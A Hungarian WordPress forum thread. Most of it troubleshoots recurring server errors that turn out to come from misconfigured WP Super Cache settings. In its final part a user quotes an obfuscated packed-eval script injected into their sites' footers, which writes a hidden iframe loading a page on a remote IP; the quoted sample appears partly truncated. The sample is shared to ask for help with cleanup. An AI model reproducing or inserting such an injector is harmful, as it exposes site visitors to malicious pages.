Sziasztok,
Sajnos két napja szinte használhatatlan az oldalam.10 betöltésből 8 hiba üzenet.A saját vezérlőpultomat is csak szökő évente érem el,mert folyton ezeket a hibaüziket kapom amikről csatoltam a képet.A honlapom lassan egy éves,sokszor volt hogy ez a hiba üzenet jött be,de az tényleg ritka volt és előbb utóbb mindig javult a helyzet,de most két napja katasztrófa.Többször le kellett állítanom az egész oldalt,hogy egyáltalán betudjak lépni végre és új bejegyzést írjak az oldalra.Szóval az ha nincs senki az oldalon úgy látszik segít,viszont még sem lehet a nagy forgalomra fogni,mert tegnap este amikor szinte folyamatosan a hiba üzeneteket kaptam akkor 30an se voltak a honlapom,máskor meg volt már hogy 600 online embert is elbír.De 150-en átlaggal számolva sosincs gond,Szóval nem lehet a sok felhasználó miatt sem.Anno már egyszer írtam a tárhelyszolgáltatómnak,hogy ezeket a hiba üzeneteket kapom mi a gond,azt mondták hogy náluk biztos nincs semmi gond hiszen sok ezer ügyfélnek nincs gondja semmivel akkor nekem miért lenne.Rá kerestem itt a fórumban is erre a hiba üzenetre és láttam többeknél ilyen gondot,de ott mindig leírtátok hogy itt meg ott elállított elírt valamit.Nálam ez kizárt mert egyáltalán nem értek hozzá és még csak azt se tudom mik azok amiket ott elírtak.Én tényleg csak a honlapszerkesztéshez értek annál tovább már semmi.És nálam ugye nem folyamatos a hiba üzenet,de ez így már használhatatlan.Szóval valaki valami ötlet?Mit adjak fel a wordpresst vagy a tárhelyszolgáltatóm?
Köszönöm,
Ha egyszer megy, egyszer meg nem megy, (és, amikor megy, akkor rendesen megy - ahogyan azt írtad), akkor jobb lesz, ha cserélsz tárhely-szolgáltatót.
Szerintem, az osztott tárhelye a lakótársak felzabálják az erőforrásokat (az eggyel erősebb előfizetés is lehet, hogy segítene, amikor nem egy heringes dobozban kell a honlapodnak nyújtózkodnia.
Már egy csomó bővítést vettem tőlük év elején (http://domain-tarhely.net/) ,mert minél több látogatóm volt nem bírta a honlap és ez így oké természetesen folyamatosan vettem őket aztán rendben is volt.Az hogy hébe-hóba,ez pár naponta egy-két ilyen hiba betöltést jelent az semmi.De ez most katasztrófa,már teljesen ellehetetleníti az egészet.Le is írtam nekik megint még szombaton csatolva a képeket de csesznek azóta is válaszolni.Pedig ugye 0-24support van náluk.Csak valahogy még se.De már írtam egy másik szolgáltatónak,hogy működne a váltás.De benne van a pakliban,hogy ott is előjön és még is a wordpressel van valami.
Ez a statisztika mond valami rosszat? És most mikor ezt néztem 21-en vannak megint online ami nagyon alacsony.
ÉS most szétnéztem a cPanelben is van hibajelentő Ott a legutolsó 300 hibát írja ki,ami csak 10 percre visszamenőleg is megvan a 300 db,azt se mondják hogy ez normális.Kb másodpercenként ki ír egy ilyen hibát:
Sz@rul van beállítva a szerver. A restorecron parancs elvileg megoldja az “unable to check htaccess file” problémát, legalábbis átmenetileg biztosan, de fene tudja mi lehet még nem megfelelően beállítva…
Amit te tudsz tenni, az, hogy megnézed milyen jogosultságok vannak a honlapodon. A könyvtáraknál 755 a jó, fájloknál 644.
De szerintem jobb, ha “csomagolsz és költözöl”. Akár hozzám is jöhetsz
Írtak azt mondták ez valóban nem normális dolog,de biztos nem tárhely gond hanem valami bug van az oldalon.
Most elküldtem nekik amit te írtál hiba leírásnak hogy arra tudnak e valamit mondani.
Meg azt írták a nem kívánotos robotokat kizártam e.
Az lehet indok?Pl egy ideje azt látom most is csak 23 vannak online de az oldal a stat 203 onlinet ír? Ez miért van? Van rá valami jó bővítmény?
Nézd meg, hogy honnan látogatják az oldalt, mert ha nem valódi látogatás, pl engem oroszországból nézegettek, mivel nem várok onnan vevőt így kitettem a teljes tartományt a cpanelbe. Bár lehet, hogy megérné más szolgáltatóhoz átirányítani ideiglenesen (vagy véglegesen) az oldalt
Arra is gondoltam,mert pont most levelezek a szolgáltatómmal mert egyenlőre senki nem tudja még mindig mi lehet a gond.
most írtam nekik,hogy a google szerint is 9en vannak az oldalamon most,mert minden hirdetést leállítottam,alapból 100körül kéne lenni,na de ténylegesen most 9-en vannak erre a stats meg a vezérlőpult folyamatosan 100-200online felhasználót ír és mindig ott vannak,pedig úgy van beállítva hogy 6 perc után kidobja őket.Sose megy le a szám,csak ha kikapcsolom az oldalt karbantartás módra akkor 5 perc alatt kb eltűnnek.Ahogy visszakapcsolom 5 perc és újra visszajönnek,holott akkor még valósan 2-3an vannak az oldalon.Ha felmegyek az online felhasználók listára elkezdtem nézegetni az ip-ket mind rendes magyar és mind más…Olyan mint ha beragadtak volna és folyton leterhelik az oldalt vagy nem tudom,mert én tényleg nem értek hozzá de most ezt küldtem el megint a szolgáltatónak,mert ez egyszerűen röhej hogy nem derül ki és 3 napja szar az oldal.Az meg kétlem,hogy véletlen lenne hogy pont azelőtt raktam fel az új verziót.Azt is megpróbáltam,hogy a régebbi verziót visszarakni de nem találtam sehol ilyen lehetőséget,mindenhol az új van.Most azt is megírtam a tárhelyeseknek nem lehetne az egész wordpress úgy ahogy van törölni és bizontonsági mentésből visszaállítani mindent,mert senkinek semmi más ötlete nincs.
itt vannak képek a szellem felhasználókról
Én váltanék a helyedben legalább ideiglenesen szolgáltatót. Mikor a jelenlegire költöztem lementettem a cpanelben a teljes tárhelyet, majd feltöltöttem az új szolgáltatóhoz és ők intézték a többit. Weblapom talán 2 órán át nem volt elérhető. A domaint egyelőre cpanelben át lehet irányítani az új szolgáltatóhoz. Ja és ssl alatt van az oldalam
Igen ott megcsináltam tegnap egy teljes mentést,meg már levelezek egy másikkal szolgáltatóval,hogy hogyan tudnánk megoldani csak kérdezett az is mindenféle infot.Meg még a mostani is írogat,de marhára nem megyünk semmire. Most az a legújabb hogy én írtam át ma délután a [font=Verdana;font-size:small]wp-config.php fájt ezt látják,mondtam hogy azt se tudom hogy kell átírni,meg gondolom azt a fájlkezelőben kellene oda meg főképp hónapok óta be sem léptem.Az meg csak mellék info,hogy akárki írta át azt a hiba nem ma kezdődött hanem 3 napja tart folyamatosan.[/font]
Nah megírtam a tárhelyeseknek,hogy akkor ezt fejezzük be és zárjuk le azzal,hogy fogalmuk sincs mi a probléma és azt meg főleg nem tudják,hogy tudnák kijavítani.
Erre jött ez: “[font=Verdana;font-size:small]A honlapot egy tapasztalt programozóval kellene optimalizáltatni ahhoz, hogy gyors legyen és kevés erőforrást használjon. Amíg ezzel a kismillió pluginnel felvértezett WordPress-t használod, ráadásul gyorsítótárazás nélkül, addig nem lesz jobb a helyzet.”[/font]
[font=Verdana;font-size:small]Tehát az a baj,hogy van 20 bővítményem ami már ott van hónapok óta nincs baj velük.Múlt hónapban meg volt 688ezer látogatóm gond nélkül,volt hogy órákig 600nál is többen voltak egyszerre az oldalon,akkor volt egy kis lassulás ami akkor érthető volt.Most 3 napja a napi 3ezer látogatót se tudom elérni és 20 online főnél is folyamatosan le áll az oldal.Nah mind1 elkezdtem ezt leírni nekik de már töröltem inkább.[/font]
Nah úgy néz ki teljesen véletlen kiderült az egész baj oka :unsure:
Van ez az WP Super Cache bővítmény, és párnapja ott állítgattam át pár dolgot,pl hogy 5 percenként keressen,meg hogy magától törölje amit kell ilyesmiket csak azt hittem az csak jó lehet.Nah és most visszaállítottam mindet alapba és rögtön be is indult minden.
“elkezdtem nézegetni az ip-ket mind rendes magyar és mind más” , (bocs az idézésért) vagy nem. De minden esetre örülök a saját nevemben, hogy helyreállt az oldal
Sziasztok! Elnézést így direktbe mint a kezdők, akiknek nagy a bajuk!
Segítsetek kérlek, hogy mi a csuda lehet ez az elábbi script, több 10-en wordpress oldalamba került be és emiatt a Google míg nem törölte, addig támadó webhely néven megtiltotta a böngészőbe a megjelenést. Letiltotta az oldalt piros háttérrel, ha valaki ismeri.
Szóval ez a Footer-be épül be rendszeresen: (most átírom a scriptbe, a c-t azért k-ra). De mindenképp erről a countertag18-ról van szó.
Mi ez Vírus, kémprogram, vagy mi a Rák?
<br />
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('6.7('');',15,15,'|iframe|board|src|height|width|document|write|http|page1|php|19|20|219|124'.split('|'),0,{}))
```<br />
Minden segítségetek köszönöm!
Feltörték az oldalad vagy tárhelyed.
Ftp-n és mindenhol máshol a weblapon jelszó váltás, újratelepítés nulláról.